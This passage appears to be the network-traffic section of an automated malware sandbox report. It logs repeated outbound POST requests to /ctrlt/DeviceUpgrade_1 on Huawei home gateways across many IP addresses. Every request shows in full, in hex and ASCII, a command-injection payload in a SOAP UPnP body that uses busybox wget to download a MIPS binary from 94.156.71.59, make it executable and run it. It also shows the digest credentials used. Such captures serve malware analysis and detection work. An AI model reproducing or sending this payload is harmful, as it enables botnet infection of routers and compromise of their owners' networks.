                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1067192.168.2.134922841.225.203.16837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.634727955 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1068192.168.2.1342712156.90.151.21637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.638112068 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1069192.168.2.134824241.255.9.21437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.640758991 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1070192.168.2.1340324197.124.156.9937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.643393993 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1071192.168.2.1340514197.221.156.6737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.645848989 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1072192.168.2.1335498197.41.235.18037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.648452044 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1073192.168.2.1349062197.172.81.20037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.651057005 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1074192.168.2.1356428197.48.76.16237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.653845072 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1075192.168.2.134817241.15.216.2337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.656003952 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1076192.168.2.1360466197.151.240.6137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.658639908 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 